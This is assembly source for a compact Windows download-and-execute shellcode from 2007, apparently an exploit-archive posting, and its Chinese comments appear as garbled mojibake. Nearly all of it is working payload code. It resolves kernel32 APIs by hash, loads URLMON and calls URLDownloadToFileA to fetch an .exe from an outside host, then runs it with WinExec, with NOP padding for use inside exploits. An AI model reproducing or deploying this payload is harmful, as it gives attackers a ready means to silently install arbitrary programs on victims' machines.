;Tiny Download&&Exec ShellCode codz czy 2007.6.1 ;header 163=61(16+8+9+(28))+95(68+27)+17 ;163+19=192 comment % #--------------------------------------# # # Tiny Download&&Exec ShellCode--> # # # -->size 192 # # # 2007.06.01 # # codz: czy # # # www.ph4nt0m.org # # #------------------------------------------# # system :test on ie6+XPSP2/2003SP2/2kSP4 % .586 .model flat,stdcall option casemap:none include c:\masm32\include\windows.inc include c:\masm32\include\kernel32.inc includelib c:\masm32\lib\kernel32.lib include c:\masm32\include\user32.inc includelib c:\masm32\lib\user32.lib .data shelldatabuffer db 1024 dup(0) shellcodebuffer db 2046 dup(0) downshell db 'down exploit',0 .code start: invoke MessageBoxA,0,offset downshell,offset downshell,1 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 mov eax,offset shellcodebuffer jmp eax somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h ;???聫???娄,碌?,,,麓?潞?,?芦?耂??,掳?'?"?聅,麓?潞?,?芦,露?耑?-?聬,碌?,,shellcode?'?+,露,炉?耂?陆,戮?聺,露?耑?-?聬?-,麓?聬?聬,拢,卢?,,,拢?,,?垄?耾?娄?耂,碌,碌?,,shellcode?-,麓?聬?聬,禄,路,戮,鲁 @@shellcodebegin: call @@beginaddr @@beginaddr: PUSH 03H ;?',陋,碌?路?"??,碌?,,API,潞,炉?耂?陆,赂?露?耂?陆 jmp @@realshellcode myExitProcess dd 073e2d87eh myWinExec dd 00e8afe98h myLoadLibraryA dd 0ec0e4e8eh dll db 'URLMON',0,0 myUrlDownFile dd 0702f1a36h path db 'c:\a.exe',0 url db 'http://www.ph4nt0m.org/a.exe',0 @@realshellcode: POP ECX POP EDI SCASD ;edi+4 ;,碌??,碌,陆kernel32.dll,禄?鹿,碌?聗?-,路 db 67h,64h,0A1h,30h,00h mov eax, [eax+0cH] mov esi, [eax+1cH] lodsd mov ebp, [eax+08H] ;EBP?-?聬,麓?娄,路?...kernel32.dll,碌?,,,禄?鹿,碌?聗?-,路 ;,麓,娄?翬UR?颅,碌,录,鲁?露,卤?颅 @@next2: PUSH ECX @@next3: MOV ESI,[EBP+3Ch] MOV ESI,[EBP+ESI+78h] ADD ESI,EBP PUSH ESI MOV ESI,[ESI+20h] ADD ESI,EBP XOR ECX,ECX DEC ECX @@next: INC ECX LODSD ADD EAX,EBP XOR EBX,EBX @@again: MOVSX EDX,BYTE PTR [EAX] CMP DL,DH JZ @@end ROR EBX,0Dh ADD EBX,EDX INC EAX JMP @@again @@end: CMP EBX,[EDI] JNZ @@next POP ESI MOV EBX,[ESI+24h] ADD EBX,EBP MOV CX,WORD PTR [ECX*2+EBX] MOV EBX,[ESI+1Ch] ADD EBX,EBP MOV EAX,[ECX*4+EBX] ADD EAX,EBP STOSD POP ECX loop @@next2 mov ecx,[edi] ;2 cmp cl,'c' ;3 jz @@downfile ;2 PUSH EDI CALL EAX ;2 xchg eax,ebp scasd scasd push 01 ;2,碌?聅,露?戮,赂?露DLL,碌?,,,潞,炉?耂?陆,赂?露?耂?陆 jmp @@next3 ;2 ;?--?耾e,录?+17 @@downfile: push edx ;0 push edx ;0 push edi ;file=c:\a.exe lea ecx, dword ptr [edi+9h] push ecx ;url push edx ;0 call eax ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0 push 1 ;FOR TEST push edi call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1 call dword ptr [edi-18H] ;Exitprocess somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h invoke ExitProcess,0 end start ; milw0rm.com [2007-06-27]